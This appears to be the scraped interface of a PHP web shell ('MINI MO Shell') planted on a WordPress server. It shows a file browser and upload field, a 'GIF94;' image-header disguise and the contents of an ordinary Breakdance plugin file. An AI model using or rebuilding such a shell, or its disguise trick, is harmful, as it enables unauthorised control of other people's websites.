GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/dynamic-data/fields/post/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/dynamic-data/fields/post/post-content.php

<?php

namespace Breakdance\DynamicData;

class PostContent extends StringField
{

    /**
     * @inheritDoc
     */
    public function label()
    {
        return __('Post Content', 'breakdance');
    }

    /**
     * @inheritDoc
     */
    public function category()
    {
        return __('Post', 'breakdance');
    }

    /**
     * @inheritDoc
     */
    public function slug()
    {
        return 'post_content';
    }

    /**
     * @inheritDoc
     */
    public function handler($attributes): StringData
    {
        ob_start();
        the_content();
        return StringData::fromString(ob_get_clean());
    }

    /**
     * @inheritDoc
     */
    function proOnly() {
        return false;
    }

}

OHA YOOO - Tarih: 2026-08-04 03:50:48